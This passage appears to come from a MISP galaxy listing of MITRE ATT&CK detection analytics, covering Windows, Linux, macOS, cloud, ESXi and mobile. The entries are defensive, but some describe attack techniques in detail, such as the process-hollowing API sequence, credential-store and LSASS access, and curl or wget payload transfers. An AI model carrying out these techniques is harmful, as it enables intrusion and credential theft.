UUID 97a188cf-5851-4cb7-9bb5-17702707d52b which can be used as unique global reference for Analytic 1067 - AN1067 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1067
mitre_platforms ['Network Devices']

Analytic 0617 - AN0617

Detects USB block device mount followed by file access in sensitive directories or high-volume copy operations by user-controlled processes.

Internal MISP references

UUID 9cf3c7bb-296e-445a-ba30-012060b9ccac which can be used as unique global reference for Analytic 0617 - AN0617 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0617
mitre_platforms ['Linux']

Analytic 0176 - AN0176

Unquoted service or shortcut paths that contain spaces and allow path interception by higher-level executables. Defender observes registry service configurations with unquoted paths, file creation of executables in parent directories of unquoted paths, and subsequent process execution from unexpected locations.

Internal MISP references

UUID a972f507-cf1b-4e2f-acdc-877a7891b7cf which can be used as unique global reference for Analytic 0176 - AN0176 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0176
mitre_platforms ['Windows']

Analytic 1076 - AN1076

Detects adversary use of suspended process creation, using the CREATE_SUSPENDED flag via CreateProcess, followed by unmapping the memory of the child process (NtUnmapViewOfSection) and replacing it with malicious code via VirtualAllocEx/WriteProcessMemory, then SetThreadContext and ResumeThread to begin execution within the hollowed process.

Internal MISP references

UUID bcb01d01-66f6-47bb-9ca1-46b4ce686ad4 which can be used as unique global reference for Analytic 1076 - AN1076 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1076
mitre_platforms ['Windows']

Analytic 0671 - AN0671

Monitor for abnormal certificate enrollment and usage activity in Active Directory Certificate Services (AD CS), registry access to certificate storage locations, and unusual process executions that attempt to export or access private keys.

Internal MISP references

UUID c448cbb5-1256-4a00-8582-1759fb5a6e56 which can be used as unique global reference for Analytic 0671 - AN0671 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0671
mitre_platforms ['Windows']

Analytic 1760 - AN1760

Mobile security products can often alert the user if their device is vulnerable to known exploits.

Internal MISP references

UUID 3307605e-f2ac-4cfb-be12-5d880e1bfa11 which can be used as unique global reference for Analytic 1760 - AN1760 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1760
mitre_platforms ['Android']

Analytic 1670 - AN1670

Mobile security products can often alert the user if their device is vulnerable to known exploits.

Internal MISP references

UUID de37eb78-5f35-4327-99d0-ad6546ab0fb6 which can be used as unique global reference for Analytic 1670 - AN1670 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1670
mitre_platforms ['iOS']

Analytic 1706 - AN1706

Application vetting services could look for usage of the READ_PRIVILEGED_PHONE_STATE Android permission. This could indicate that non-system apps are attempting to access information that they do not have access to.

Internal MISP references

UUID f44bab9b-554c-4dc7-b57f-4011ce609c2b which can be used as unique global reference for Analytic 1706 - AN1706 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1706
mitre_platforms ['Android']

Analytic 0816 - AN0816

Detects API calls registering or updating hybrid identity connectors, modification of cloud-to-on-premises federation trust, and unusual token issuance logs.

Internal MISP references

UUID 80e4f847-a149-423b-a179-cbcf4afd06b9 which can be used as unique global reference for Analytic 0816 - AN0816 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0816
mitre_platforms ['IaaS']

Analytic 0186 - AN0186

Chain: (1) udev / kernel logs show hot-plug (USB/Thunderbolt/PCIe); (2) block device created by udisks/diskarbitration; (3) optional: new network interface or DHCP lease observed. Correlate /var/log/messages|syslog, auditd SYSCALL open/creat on /dev, and DHCP/Zeek.

Internal MISP references

UUID 81cd2610-bc6c-46bf-8d3c-d6e30c7f51c8 which can be used as unique global reference for Analytic 0186 - AN0186 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0186
mitre_platforms ['Linux']

Analytic 0618 - AN0618

Detects external volume mount with Finder, Terminal, or script-initiated file copy from user profiles, sensitive folders, or cloud storage sync directories to USB.

Internal MISP references

UUID 9d7fd025-d8eb-48ab-8fca-df6b09761aec which can be used as unique global reference for Analytic 0618 - AN0618 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0618
mitre_platforms ['macOS']

Analytic 0681 - AN0681

Defenders may observe attempts to alter cryptographic settings on network devices that reduce key strength or allowable cipher suites. Suspicious indicators include configuration changes that downgrade encryption algorithms, key length parameters, or the disabling of strong encryption in favor of legacy ciphers. These activities often appear as CLI commands modifying crypto policies, firmware changes affecting crypto libraries, or unexpected updates to key management files. Correlation across device config logs and traffic analysis showing weaker ciphers provides higher confidence of malicious key space reduction.

Internal MISP references

UUID b9e42cd6-da26-4e57-b628-aca0fb1bb3f3 which can be used as unique global reference for Analytic 0681 - AN0681 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0681
mitre_platforms ['Network Devices']

Analytic 0861 - AN0861

Detection focuses on identifying unauthorized or anomalous changes to compute infrastructure components. Defender perspective: monitor for creation, deletion, or modification of instances, volumes, and snapshots outside of approved change management windows; correlate abnormal activity such as rapid snapshot creation followed by new instance mounts, or repeated infrastructure changes by rarely used accounts. Flagging activity linked to unusual geolocation, API client, or automation script is suspicious.

Internal MISP references

UUID c9be9fb3-460f-42bc-9b56-3bb88839aeab which can be used as unique global reference for Analytic 0861 - AN0861 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0861
mitre_platforms ['IaaS']

Analytic 1608 - AN1608

Account creation via cloud service APIs or CLI, often associated with key generation. Monitored via CloudTrail or equivalent audit logs.

Internal MISP references

UUID d715d148-4d2d-407c-bd83-c471a4163d4e which can be used as unique global reference for Analytic 1608 - AN1608 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1608
mitre_platforms ['IaaS']

Analytic 1086 - AN1086

A process or terminal command outside of standard shell utilities reads the user's .bash_history file. On macOS, unified logs or telemetry tools like EndpointSecurity (ESF) may observe file read APIs or terminal process lineage that shows non-user-initiated access.

Internal MISP references

UUID ead38dff-ee26-477d-be5a-69b52dc8bd50 which can be used as unique global reference for Analytic 1086 - AN1086 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1086
mitre_platforms ['macOS']

Analytic 1068 - AN1068

Detects encoded PowerCLI or Base64-encoded payloads staged via datastore uploads or shell access (e.g., ESXi Shell or backdoored VIBs).

Internal MISP references

UUID f1ec63bc-294c-471c-ae9f-4dd70f3c036a which can be used as unique global reference for Analytic 1068 - AN1068 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1068
mitre_platforms ['ESXi']

Analytic 0168 - AN0168

Command line interface or vCLI triggers remote transfer using wget or curl, writing files into datastore paths or local tmp directories.

Internal MISP references

UUID fac5b2df-a58d-424e-a351-7d7ca05260e8 which can be used as unique global reference for Analytic 0168 - AN0168 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0168
mitre_platforms ['ESXi']

Analytic 1806 - AN1806

The user can view a list of active device administrators in the device settings.

Internal MISP references

UUID 75eaee42-f7b5-4792-9611-74626bd98838 which can be used as unique global reference for Analytic 1806 - AN1806 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1806
mitre_platforms ['Android']

Analytic 1680 - AN1680

On Android, the user can use the device settings menu to view trusted CA certificates and look for unexpected or unknown certificates. A mobile security product could similarly examine the trusted CA certificate store for anomalies. Users can use the device settings menu to view which applications on the device are allowed to install unknown applications.

On iOS, the user can use the device settings menu to view installed Configuration Profiles and look for unexpected or unknown profiles. A Mobile Device Management (MDM) system could use the iOS MDM APIs to examine the list of installed Configuration Profiles for anomalies.

Internal MISP references

UUID 8e20de5b-1b9c-4443-a095-bcdd52ed161e which can be used as unique global reference for Analytic 1680 - AN1680 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1680
mitre_platforms ['iOS']

Analytic 1960 - AN1960

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 10222534-1e1d-473c-a2cb-674126f87ad8 which can be used as unique global reference for Analytic 1960 - AN1960 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1960
mitre_platforms ['PRE']

Analytic 0196 - AN0196

Detects rsync or scp inbound from other hosts that then aggregate content into /Users/Shared or /private/tmp, often involving compressed files or scripts.

Internal MISP references

UUID 2891bd53-5a81-4330-bb05-ffd731868d06 which can be used as unique global reference for Analytic 0196 - AN0196 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0196
mitre_platforms ['macOS']

Analytic 0691 - AN0691

CONTAINERS (Docker/K8s/containerd): A user pulls an untrusted image from a public/unknown registry and then creates/starts a container from that image. Shortly after start, the container spawns unexpected utilities (e.g., curl/wget/bash/python), or makes outbound network connections atypical for the namespace/workload. The analytic correlates Image Creation/Download → Container Creation → Container Start → Command Execution/Network activity within a short window and with a consistent image digest.

Internal MISP references

UUID 4c16cebd-ac7e-472a-ae12-62966cbd19e2 which can be used as unique global reference for Analytic 0691 - AN0691 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0691
mitre_platforms ['Linux']

Analytic 0619 - AN0619

Unusual or unauthorized processes accessing microphone APIs (e.g., winmm.dll, avrt.dll) followed by audio file writes to user-accessible or temp directories.

Internal MISP references

UUID 5aaad268-48fb-4826-9f68-b666e1b4a3bf which can be used as unique global reference for Analytic 0619 - AN0619 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0619
mitre_platforms ['Windows']

Analytic 1609 - AN1609

Unexpected creation or modification of files with com.apple.ResourceFork extended attributes containing unusually large or non-standard data. Defender perspective: detection of resource forks in contexts where they are uncommon, especially when paired with process execution or network activity.

Internal MISP references

UUID 619804e7-5ae7-4c6e-b1bb-e1d10a22cc87 which can be used as unique global reference for Analytic 1609 - AN1609 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1609
mitre_platforms ['macOS']

Analytic 1069 - AN1069

Detects rogue Wi-Fi access points broadcasting the same SSID as legitimate APs with stronger signal strength, unexpected MAC/BSSID values, or inconsistent encryption settings. Correlates authentication attempts, captive portal redirections, and anomalous traffic flows through unauthorized APs.

Internal MISP references

UUID 670462e3-6c3e-4779-af75-2a0424a5d221 which can be used as unique global reference for Analytic 1069 - AN1069 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1069
mitre_platforms ['Network Devices']

Analytic 0916 - AN0916

Detection of anomalous driver and firmware interactions, including unsigned or unexpected firmware updates, driver loads linked to hardware components, and suspicious use of privileged APIs to read/write firmware or controller memory.

Internal MISP references

UUID 6f2fdf37-f603-4264-aed1-24fe2d1aa094 which can be used as unique global reference for Analytic 0916 - AN0916 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0916
mitre_platforms ['Windows']

Analytic 1096 - AN1096

Correlation of file creation/modification of .desktop files within XDG autostart directories, followed by execution of processes at user login initiated by the desktop environment. Malicious entries typically include suspicious Exec paths or anomalous names and are not associated with installed packages.

Internal MISP references

UUID 7bd7f602-0f85-4e96-bd40-ae4a6f490b32 which can be used as unique global reference for Analytic 1096 - AN1096 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1096
mitre_platforms ['Linux']

Analytic 0961 - AN0961

Defenders may observe unauthorized modifications to encryption-related configuration files, firmware, or crypto modules on network devices. Suspicious patterns include changes to cipher suite configurations, unexpected firmware updates affecting crypto libraries, disabling of hardware cryptographic accelerators, or reductions in key length policies. Correlating configuration changes with anomalies in encrypted traffic characteristics (e.g., weaker ciphers or sudden plaintext transmission) strengthens detection.

Internal MISP references

UUID b192336c-4a85-4322-9ae8-fd6eb6b7747b which can be used as unique global reference for Analytic 0961 - AN0961 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0961
mitre_platforms ['Network Devices']

Analytic 0169 - AN0169

Network device logs show anomalous inbound file transfers or uncharacteristic flows with high payload volume to network devices with storage or automation hooks.

Internal MISP references

UUID c93951a7-7f78-40cf-a891-30d6c6a9bee6 which can be used as unique global reference for Analytic 0169 - AN0169 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0169
mitre_platforms ['Network Devices']

Analytic 1690 - AN1690

Remote access software typically requires many privileged permissions, such as accessibility services or device administrator.

Internal MISP references

UUID a180ad2e-e3fa-4cec-a1f0-8baf754d9543 which can be used as unique global reference for Analytic 1690 - AN1690 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1690
mitre_platforms ['iOS']

Analytic 0771 - AN0771

Detection of new IAM roles or policies attached to a user/service in AWS/GCP/Azure outside normal patterns or hours, often following account compromise.

Internal MISP references

UUID 04412d94-62ac-4484-9408-c4ca1c206f1b which can be used as unique global reference for Analytic 0771 - AN0771 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0771
mitre_platforms ['IaaS']

Analytic 1077 - AN1077

Detects adversary behavior where a newly created or renamed user account closely resembles existing service or administrator accounts to blend in and avoid detection. Common patterns include prefix/suffix modifications, homoglyphs, or use of names like 'admin1', 'adm1n', or 'backup_help'.

Internal MISP references

UUID 8c3a43bc-dd07-4e72-a987-a2dc36e162fa which can be used as unique global reference for Analytic 1077 - AN1077 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1077
mitre_platforms ['Windows']

Analytic 0177 - AN0177

Defenders may detect abuse of container administration commands by observing anomalous use of management utilities (docker exec, kubectl exec, or API calls to kubelet) correlated with unexpected process creation inside containers. Behavioral chains include unauthorized API requests followed by command execution within running pods or containers, often originating from unusual user accounts, automation scripts, or IP addresses outside the expected cluster management plane.

Internal MISP references

UUID ab1122c5-f459-4097-8ba7-f5a7960d2da5 which can be used as unique global reference for Analytic 0177 - AN0177 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0177
mitre_platforms ['Containers']

Analytic 0717 - AN0717

Defenders may detect adversaries forging web credentials in IaaS environments by monitoring for anomalous API activity such as AssumeRole or GetFederationToken being executed by unusual principals. These events often correlate with sudden logon sessions from unfamiliar IP addresses or regions. The chain is usually secret material misuse (stolen private key or password) → API request generating a new token → access to high-value resources.

Internal MISP references

UUID fca70138-f183-4deb-b2a4-59908c76070b which can be used as unique global reference for Analytic 0717 - AN0717 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0717
mitre_platforms ['IaaS']

Analytic 1770 - AN1770

Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application. Many properly configured firewalls may naturally block command and control traffic.

Internal MISP references

UUID ab85ff40-2b75-477a-b5ec-f35f2fcde728 which can be used as unique global reference for Analytic 1770 - AN1770 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1770
mitre_platforms ['Android']

Analytic 1707 - AN1707

Application vetting services could look for usage of the READ_PRIVILEGED_PHONE_STATE Android permission. This could indicate that non-system apps are attempting to access information that they do not have access to.

Internal MISP references

UUID cb4c4b76-3f6d-4387-ab20-74b461bbb211 which can be used as unique global reference for Analytic 1707 - AN1707 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1707
mitre_platforms ['iOS']

Analytic 0817 - AN0817

Detects tenant-wide authentication or conditional access changes that weaken hybrid identity enforcement, including disabling AD FS or bypassing hybrid MFA policies.

Internal MISP references

UUID 07b8a45e-6435-4c67-ac15-47db21c1d1b9 which can be used as unique global reference for Analytic 0817 - AN0817 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0817
mitre_platforms ['Office Suite']

Analytic 0871 - AN0871

Multi-event correlation of Registry creation under Active Setup with anomalous execution of processes at user logon. Behavioral patterns include creation/modification of HKLM Active Setup keys with non-standard StubPath values, followed by process execution from uncommon paths, unsigned binaries, or unusual parent-child lineage post-user login.

Internal MISP references

UUID 0be2ac94-5f56-4bdc-bf07-ec9ea08c8bb7 which can be used as unique global reference for Analytic 0871 - AN0871 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0871
mitre_platforms ['Windows']

Analytic 0178 - AN0178

Behavioral chain: (1) a user-facing app (browser/Office/email client) launches a URL or handles a link, then (2) the same process lineage makes an outbound connection to an untrusted domain/IP, (3) a file is downloaded or unpacked to a user-writable location shortly after the click. Optional enrichment: subsequent child execution by LOLBINs.

Internal MISP references

UUID 12849ba4-39da-48c9-bf3d-c51a6cc3f85b which can be used as unique global reference for Analytic 0178 - AN0178 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0178
mitre_platforms ['Windows']

Analytic 0187 - AN0187

Chain: (1) unified logs report IOUSBHost/IOThunderbolt device arrival; (2) diskarbitrationd attaches a new volume; (3) optional: config profile manipulation or new network interface MAC obtains a lease. Correlate unifiedlogs (subsystems: IOUSBHost, IOKit, diskarbitrationd), FSEvents, and DHCP/Zeek.

Internal MISP references

UUID 5bbe0089-4927-4415-bff7-14a3ba5543c0 which can be used as unique global reference for Analytic 0187 - AN0187 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0187
mitre_platforms ['macOS']

Analytic 1078 - AN1078

Detects creation or renaming of accounts with names that closely match known service, root, or admin accounts. Behavior often follows account discovery or deletion, attempting to blend into system activity logs using trusted name conventions.

Internal MISP references

UUID 5f584d00-63b5-44c5-b629-ff238f5b9931 which can be used as unique global reference for Analytic 1078 - AN1078 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1078
mitre_platforms ['Linux']

Analytic 0718 - AN0718

Forged web credentials may manifest as anomalous SAML token issuance, OpenID Connect token minting, or Zimbra pre-auth key usage. Defenders may see tokens issued without normal authentication events, multiple valid tokens generated simultaneously, or signing anomalies in IdP logs.

Internal MISP references

UUID d1eafedb-ac64-46b0-972d-8f8759fc11b3 which can be used as unique global reference for Analytic 0718 - AN0718 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0718
mitre_platforms ['Identity Provider']

Analytic 0781 - AN0781

Behavior chain involving abnormal registry modifications via CLI, PowerShell, WMI, or direct API calls, especially targeting persistence, privilege escalation, or defense evasion keys, potentially followed by service restart or process execution. Such as editing Notify/Userinit/Startup keys, or disabling SafeDllSearchMode.

Internal MISP references

UUID de8d67d4-9d2a-4379-be8b-3ae3f3b3ac75 which can be used as unique global reference for Analytic 0781 - AN0781 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0781
mitre_platforms ['Windows']

Analytic 1087 - AN1087

Enumeration of identity roles and users via API calls such as Get-MsolRoleMember, az ad user list, or Graph API tokens from unauthorized users or automation accounts.

Internal MISP references

UUID f74ce996-0982-4e2a-86ee-5bce001ee9fc which can be used as unique global reference for Analytic 1087 - AN1087 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1087
mitre_platforms ['Identity Provider']

Analytic 1807 - AN1807

Mobile threat defense agents could detect unauthorized operating system modifications by using attestation.

Internal MISP references

UUID 09ea8707-d76c-44ae-b077-19a8949faa90 which can be used as unique global reference for Analytic 1807 - AN1807 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1807
mitre_platforms ['Android']

Analytic 1708 - AN1708

Monitor for API calls that are related to the AccountManager API on Android and Keychain services on iOS. Application vetting services may look for MANAGE_ACCOUNTS in an Android application’s manifest. Most applications do not need access to accounts, so extra scrutiny may be applied to those that request it.

Internal MISP references

UUID 6bd50b74-5852-4800-b459-1c54d95348e3 which can be used as unique global reference for Analytic 1708 - AN1708 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1708
mitre_platforms ['Android']

Analytic 1780 - AN1780

Detection of steganography is difficult unless detectable artifacts with a known signature are left behind by the obfuscation process. Look for strings are other signatures left in system artifacts related to decoding steganography.

Internal MISP references

UUID cda313bc-214f-4bf8-9aa2-b3fb495379c3 which can be used as unique global reference for Analytic 1780 - AN1780 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1780
mitre_platforms ['Android']

Analytic 1079 - AN1079

Detects adversary creation of cloud or IdP accounts whose names resemble existing privileged or service accounts. May indicate preparation for privilege escalation or defense evasion.

Internal MISP references

UUID 0252a0ff-a4fb-4196-9b43-d759af950d55 which can be used as unique global reference for Analytic 1079 - AN1079 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1079
mitre_platforms ['Identity Provider']

Analytic 0917 - AN0917

Detection of suspicious use of ioctl/sysfs calls to access device firmware, unexpected flashing tools execution, and anomalous firmware checksums logged by SMART or kernel audit mechanisms.

Internal MISP references

UUID 062580eb-eb79-4b31-b3fd-e500ebcfc128 which can be used as unique global reference for Analytic 0917 - AN0917 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0917
mitre_platforms ['Linux']

Analytic 0197 - AN0197

Detects remote writes or snapshots mounted from other systems into a central ESXi VMFS path or NFS store used for remote staging of files before exfiltration.

Internal MISP references

UUID 0e2094fe-6912-4bde-9e5a-9d95c640646a which can be used as unique global reference for Analytic 0197 - AN0197 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0197
mitre_platforms ['ESXi']

Analytic 0791 - AN0791

A remote DCOM invocation by a privileged account using RPC (port 135), followed by abnormal process instantiation or module loading on the remote system indicative of code execution.

Internal MISP references

UUID 0f94823c-ac95-48d8-9716-58f59d39974c which can be used as unique global reference for Analytic 0791 - AN0791 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0791
mitre_platforms ['Windows']

Analytic 1970 - AN1970

Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.

Internal MISP references

UUID 4884ba77-1420-4093-9dba-65e881f6dca5 which can be used as unique global reference for Analytic 1970 - AN1970 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1970
mitre_platforms ['PRE']

Analytic 0971 - AN0971

Excessive outbound traffic via ping, curl, or custom scripts indicating flooding behavior, especially with no UI context or user interaction.

Internal MISP references

UUID a82a14f4-6fc9-43b5-b183-68af3cb075a2 which can be used as unique global reference for Analytic 0971 - AN0971 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0971
mitre_platforms ['macOS']

Analytic 0179 - AN0179

Behavioral chain: (1) browser/office/GUI mail client opens a URL, (2) outbound connection to untrusted domain, (3) a new file is saved in $HOME/Downloads, /tmp, or cache immediately after.

Internal MISP references

UUID bbfa2ed1-f8d5-44cf-9da8-5e3fed544172 which can be used as unique global reference for Analytic 0179 - AN0179 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0179
mitre_platforms ['Linux']

Analytic 1097 - AN1097

Monitor for runtime data manipulations by detecting suspicious modification of application binaries, API hooking, or unexpected behavior from processes responsible for rendering or displaying data. Correlate registry edits, process creation, and unexpected binary hash mismatches.

Internal MISP references

UUID c07e8730-b5cf-4a74-be3a-938184af42df which can be used as unique global reference for Analytic 1097 - AN1097 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1097
mitre_platforms ['Windows']

Analytic 0719 - AN0719

Forged web credentials on Windows endpoints may be detected by anomalous browser cookie files, local token cache manipulations, or tools injecting tokens into sessions. Defenders may observe processes accessing LSASS or browser credential stores unexpectedly, followed by unusual logon sessions.

Internal MISP references

UUID ff0d2f8d-1fff-4bda-94e6-c0cd50abe6ed which can be used as unique global reference for Analytic 0719 - AN0719 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0719
mitre_platforms ['Windows']

Analytic 1790 - AN1790

Applications could be vetted for their use of the clipboard manager APIs with extra scrutiny given to application that make use of them.

Internal MISP references

UUID 6a3e1244-3832-4523-81bc-56598a280b16 which can be used as unique global reference for Analytic 1790 - AN1790 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1790
mitre_platforms ['Android']

Analytic 1709 - AN1709

Monitor for API calls that are related to the AccountManager API on Android and Keychain services on iOS. Application vetting services may look for MANAGE_ACCOUNTS in an Android application’s manifest. Most applications do not need access to accounts, so extra scrutiny may be applied to those that request it.

Internal MISP references

UUID cbb3d486-b7a3-44f0-a7c7-e2fbf668f6fa which can be used as unique global reference for Analytic 1709 - AN1709 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1709
mitre_platforms ['iOS']

Analytic 1088 - AN1088

Use of AWS CLI (aws iam list-users, list-roles), Azure CLI (az ad user list), or GCP CLI (gcloud iam service-accounts list) from endpoints or cloud shells where such activity is unexpected.

Internal MISP references

UUID 3d124174-1e58-44e2-9f5b-f63394fb7a2e which can be used as unique global reference for Analytic 1088 - AN1088 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1088
mitre_platforms ['IaaS']

Analytic 0188 - AN0188

Unusual inbound email activity where attachments or embedded URLs are delivered to users followed by execution of new processes or suspicious document behavior. Detection involves correlating email metadata, file creation, and network activity after a phishing message is received.

Internal MISP references

UUID 5ea048cd-f1d5-4da2-9128-10c53ee337c8 which can be used as unique global reference for Analytic 0188 - AN0188 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0188
mitre_platforms ['Windows']

Analytic 0881 - AN0881

Office application auto-loads a non-standard DLL during startup triggered via Office Test Registry key, often without macro warning banners. DLL persistence mechanism circumvents traditional macro defenses.

Internal MISP references

UUID a677cebe-06e8-4993-bd4c-6a6884862444 which can be used as unique global reference for Analytic 0881 - AN0881 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0881
mitre_platforms ['Office Suite']

Analytic 0818 - AN0818

Detects suspicious changes to SAML/OAuth federation configurations, such as new signing certificates, altered endpoints, or claims issuance rules granting elevated privileges.

Internal MISP references

UUID bf166688-0c78-43a5-bb87-3159c1b86584 which can be used as unique global reference for Analytic 0818 - AN0818 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0818
mitre_platforms ['SaaS']

Analytic 1808 - AN1808

The user can view which applications have permission to use the camera through the device settings screen, where the user can then choose to revoke the permissions. During the vetting process, applications using the Android permission android.permission.CAMERA, or the iOS NSCameraUsageDescription plist entry could be given closer scrutiny.

Internal MISP references

UUID 4476a312-d2c9-459e-96a3-53ac0b676c52 which can be used as unique global reference for Analytic 1808 - AN1808 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1808
mitre_platforms ['Android']

Analytic 1089 - AN1089

Bulk enumeration of cloud user email identities through Get-Recipient, Get-Mailbox, Get-User, or Graph API directory listings by abnormal accounts or suspicious sessions.

Internal MISP references

UUID 0961ff0c-8c36-4820-948d-12855b7f5cc7 which can be used as unique global reference for Analytic 1089 - AN1089 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1089
mitre_platforms ['Office Suite']

Analytic 0819 - AN0819

User opens a file delivered by email, web, chat, or share. The handler application (Word/PDF reader/archiver) creates a file in user-controlled paths (Downloads, Temp, Desktop) and then spawns a new or unusual child process (e.g., powershell.exe, wscript.exe, cmd.exe, regsvr32.exe, rundll32.exe, msiexec.exe). Optional precursors include FileStreamCreated (URL/UNC) and Office → system32 batch writes.

Internal MISP references

UUID 328d639e-6b8d-400c-9cdd-3c255d343e47 which can be used as unique global reference for Analytic 0819 - AN0819 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0819
mitre_platforms ['Windows']

Analytic 0981 - AN0981

Invocation of built-in commands like screencapture or use of undocumented APIs from suspicious parent processes.

Internal MISP references

UUID 5f1a4795-74e5-49b9-85bb-e186ca699648 which can be used as unique global reference for Analytic 0981 - AN0981 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0981
mitre_platforms ['macOS']

Analytic 0198 - AN0198

Detects remote write activity across cloud VMs or object storage buckets within the same region/account that correlate with data aggregation across hosts.

Internal MISP references

UUID 696b98e8-10fd-4c7a-bb80-302baca34e60 which can be used as unique global reference for Analytic 0198 - AN0198 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0198
mitre_platforms ['IaaS']

Analytic 0891 - AN0891

Cloud control plane actions disabling security services (CloudTrail logging, GuardDuty, Security Hub). Detect IAM role abuse correlating with service disable events.

Internal MISP references

UUID ac692681-2851-41b4-aff9-4b5efc4c40c8 which can be used as unique global reference for Analytic 0891 - AN0891 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0891
mitre_platforms ['IaaS']

Analytic 1980 - AN1980

